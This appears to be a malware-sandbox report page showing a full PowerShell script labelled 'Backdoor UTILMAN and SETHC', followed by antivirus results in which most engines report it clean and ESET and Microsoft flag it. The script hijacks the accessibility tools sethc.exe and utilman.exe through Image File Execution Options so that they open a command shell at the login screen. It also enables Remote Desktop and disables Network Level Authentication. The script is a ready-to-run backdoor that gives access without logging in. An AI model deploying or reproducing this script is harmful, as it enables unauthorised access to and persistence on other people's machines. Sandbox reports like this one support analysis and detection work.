Static | ZeroBOX
No static analysis available.
# Backdoor UTILMAN and SETHC
# crappy script by mRr3b00t
# hack for good
# only use with authorisation
# use at own risk blah blah blah
$admin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
if($admin -eq "True"){
New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" -Name "Debugger" -Value "cmd.exe" -Type String -Force
New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" -Name "Debugger" -Value "cmd.exe" -Type String -Force
#Enable RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
#Check NLA
(Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName . -Filter "TerminalName='RDP-tcp'").UserAuthenticationRequired
#Disable NLA
(Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName . -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)
#Check again
(Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName . -Filter "TerminalName='RDP-tcp'").UserAuthenticationRequired
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren Clean
Symantec Clean
ESET-NOD32 PowerShell/Agent.WI
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan Clean
Tencent Clean
Ad-Aware Clean
Emsisoft Clean
Comodo Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
FireEye Clean
Sophos Clean
Ikarus Clean
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Microsoft Trojan:Script/Wacatac.B!ml
Gridinsoft Clean
Arcabit Clean
ViRobot Clean
ZoneAlarm Clean
GData Clean
AhnLab-V3 Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
MAX Clean
Fortinet Clean
Panda Clean
No IRMA results available.